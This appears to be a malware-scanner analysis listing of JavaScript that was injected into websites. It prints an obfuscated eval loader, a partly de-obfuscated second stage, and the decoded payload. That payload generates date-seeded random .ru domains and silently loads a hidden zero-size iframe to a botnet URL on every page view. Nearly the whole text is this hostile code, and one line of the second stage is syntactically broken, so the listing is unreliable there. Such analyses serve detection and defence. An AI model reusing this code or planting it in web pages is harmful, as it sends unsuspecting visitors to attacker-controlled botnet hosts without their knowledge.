Quttera web malware scanner detected malicious JavaScript

1. /*
2.  * Quttera web malware scanner detected malicious JavaScript code injecting hidden iframes to
3.  * multiple domains in *.ru area
4.  */
5.  
6. /*
7.  * first obfuscation level
8.  */
9. /*km0ae9gr6m*/window.eval(String.fromCharCode(116,114,121,123,112,114,111,116,111,116,121,112,101,37,50,59,125,99,97,116,99,104,40,97,115,100,41,123,120,61,50,59,125,116,114,121,123,113,61,100,111,99,11 ... 8,34,34,41,59,102,111,114,40,59,49,55,55,54,45,53,43,53,62,105,59,105,43,61,49,41,123,106,61,105,59,105,102,40,101,41,115,61,115,43,114,91,102,114,43,40,40,101,41,63,34,67,111,100,101,34,58,49,50,41,93,40,40,119,91,106,93,47,40,53,43,101,40,34,106,37,50,34,41,41,41,41,59,125,10,105,102,40,102,41,101,40,115,41,59,125,10));/*qhk6sa6g1c*/
10.  
11. /*
12.  * second obfuscation level
13.  */
14. try {
15.     prototype % 2;
16. } catch (asd) {
17.     x = 2;
18. }
19. try {
20.     q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
21.     q.appendChild(q + "");
22. } catch (fwbewe) {
23.     i = 0;
24.     try {
25.         prototype * 5;
26.     } catch (z) {
27.         fr = "fromChar""eva";
28.     }
29.     if (v) e = window[v + "l"];
30.     w = f;
31.     s = [];
32.     r = String;
33.     z = ((e) ? "Code" : "");
34.     for (; 1776 - 5 + 5 > i; i += 1) {
35.         j = i;
36.         if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
37.     }
38.     if (f) e(s);
39. }
40.  
41.  
42.  
43. /*
44.  * decoded payload generate hidden iframes to "/runforestrun?sid=botnet2" query string
45.  * in random domains in *.ru area
46.  */
47. function nextRandomNumber(){
48.     var hi = this.seed / this.Q;
49.     var lo = this.seed % this.Q;
50.     var test = this.A * lo - this.R * hi;
51.     if(test > 0){
52.         this.seed = test;
53.     } else {
54.         this.seed = test + this.M;
55.     }
56.     return (this.seed * this.oneOverM);
57. }
58.  
59. function RandomNumberGenerator(unix){
60.     var d = new Date(unix*1000);
61.     var s = d.getHours() > 12 ? 1 : 0;
62.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF)+ (Math.round(s * 0xFFF));
63.     this.A = 48271;
64.     this.M = 2147483647;
65.     this.Q = this.M / this.A;
66.     this.R = this.M % this.A;
67.     this.oneOverM = 1.0 / this.M;
68.     this.next = nextRandomNumber;
69.     return this;
70. }
71.  
72. function createRandomNumber(r, Min, Max){
73.     return Math.round((Max-Min) * r.next() + Min);
74. }
75.  
76. function generatePseudoRandomString(unix, length, zone){
77.     var rand = new RandomNumberGenerator(unix);
78.     var letters = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z'];
79.     var str = '';
80.     for(var i = 0; i < length; i ++ ){
81.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
82.     }
83.     return str + '.' + zone;
84. }
85.  
86. setTimeout(function(){
87.     try{
88.         if(typeof iframeWasCreated == "undefined"){
89.             iframeWasCreated = true;
90.             var unix = Math.round(+new Date()/1000);
91.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
92.             ifrm = document.createElement("IFRAME");
93.             ifrm.setAttribute("src", "http://"+domainName+"/runforestrun?sid=botnet2");
94.             ifrm.style.width = "0px";
95.             ifrm.style.height = "0px";
96.             ifrm.style.visibility = "hidden";
97.             document.body.appendChild(ifrm);
98.         }
99.     }catch(e){}
100. }, 500);